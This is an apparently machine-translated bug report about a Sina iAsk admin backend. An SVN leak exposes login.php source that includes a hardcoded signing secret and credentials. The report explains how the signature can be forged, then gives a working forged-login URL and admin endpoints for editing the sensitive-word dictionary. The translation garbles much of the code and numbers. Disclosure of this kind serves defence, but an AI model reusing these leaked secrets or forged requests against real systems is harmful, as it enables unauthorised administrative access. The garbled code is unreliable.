Sina Integrated Management backend has high-risk design defects and can obtain management permissions (permission control required)

Sina Integrated Management backend has high-risk design defects and can obtain management permissions (permission control required)

RT
The permission of the sensitive word library. Why did weibo spread the advertisement?

Source:

Http://admin.iask.sina.com.cn/.svn/entriesinformation leakage Vulnerability (fixed currently)

Look at the source code and find a place that can be forged for login;

The source code for/api/login. php is as follows:
 

Ini_set ('session. cookie_domain ', ".iask.sina.com.cn"); error_reporting (E_ALL); ini_set ('display _ errors', 1); define ('cookie _ DOMAIN', '.admin.iask.sina.com.cn '); include ('/data4/adminManage/conf/adminconf. php '); session_start (); $ appmap = array (1000 => 'd420915821e92b6559478b446445d172', 1001 => 'hangzhou ',); $ appuser = array (1000 => array ('user' => 'weibo _ zhishi', 'PW '=> '123 '), 1001 => array ('user' => 'Baby _ zhishi ', 'PW' => '000000'),); $ appto = array (123456 =>' http://admin.iask.sina.com.cn/audit/ishare_audit.php?action=indexapp ', 1001 =>' http://admin.iask.sina.com.cn/audit/ishare_audit.php?action=indexapp ',); $ Appgroup = array (1000 => array (7, 8, 10), 1001 => array (16 ),); $ appid = isset ($ _ GET ['appid '])? Intval ($ _ GET ['appid ']): 0; $ sign = isset ($ _ GET ['sign'])? $ _ GET ['sign']: ''; $ time = isset ($ _ GET ['time'])? Intval ($ _ GET ['time']): 0; $ ip = isset ($ _ GET ['IP'])? $ _ GET ['IP']: ''; $ user = isset ($ _ GET ['user'])? $ _ GET ['user']: ''; // The following judgment can be bypassed by setting parameters. appid uses 1000if (! $ Appid |! $ Sign |! $ Time |! $ Ip |! $ User |! Isset ($ appmap [$ appid]) |! Isset ($ appuser [$ appid]) {exit ('000000');} // time () function. The exit function at the bottom is commented out --! If ($ time
 // Exit ('200');} $ rip = lip: get_real_ip (); // comment out --! If ($ rip! = $ Ip) {// exit ('20140901');} error_log ($ rip. '-'. $ ip. "\ n", 3, '/tmp/apip. log'); // here you can forge it yourself ~~~ 222333 ~~~ $ Sign_me = substr (md5 ($ appid. $ user. $ time. $ ip. $ appmap [$ appid]), 3, 16); if ($ sign_me! = $ Sign) {exit ('20140901') ;}$ username = $ appuser [$ appid]; global $ db_admin; $ userDB = new admin_userDB ($ db_admin ); $ rs = $ userDB-> check_password ($ appuser [$ appid] ['user'], $ appuser [$ appid] ['PW '], true ); // set the cookie field description. you can log on to if (is_array ($ rs) {set_cookie ("userid", $ rs ['uid']); set_cookie ("username ", $ rs ['uname']); set_cookie ("name", 'supe'); set_cookie ("gname", $ rs ['gname']); set_cookie ("gid", $ rs ['gid']); set_co Okie ("menuids_admin", $ rs ['menuid']); if (! $ _ COOKIE ['lastlogintime']) {$ _ COOKIE ['lastlogintime'] = date ('Y-m-d H: I: s '); set_cookie ("lastlogintime", $ _ COOKIE ['lastlogintime']) ;}} else {exit ('20140901 ');} $ _ SESSION ['audit'] ['app'] ['username'] = $ user; $ _ SESSION ['audit'] ['app'] ['group'] = $ appgroup [$ appid]; $ result = 1000; if (isset ($ _ GET ['location']) & $ _ GET ['location'] = 1) {$ result = "<script> window. location. href = '{$ appto [$ appid]}' </script> ";} exit (" $ result "); function set_cookie ($ cname, $ cval) {setcookie ($ cname, $ cval, 0, "/", COOKIE_DOMAIN );}

 

Verify that:

Http://admin.iask.sina.com.cn/api/login.php? Appid = 1000 & sign = 13f069bbd9f3ab16 & time = 1554091094 & ip = 8.8.8.8 & user = weibo_zhishi
 

Check that the cookie is successfully set:

Http://admin.iask.sina.com.cn/api/print.php
 

Http://admin.iask.sina.com.cn/filter/set_sensitive_vocabulary.php? Type = % C8 % AB % B2 % BF & level = % C8 % AB % B2 % BF & own = & word = & Submit = % B2 % E9 % D5 % D2 modify and delete operations:
 

What are these keywords? It should be a sensitive dictionary! Can also be updated ~~ 222333

Http://admin.iask.sina.com.cn/filter/control_set_for_ishare_content.php
 

Http://admin.iask.sina.com.cn/filter/ishare_title_red.php
 

 

Solution:

Permission Control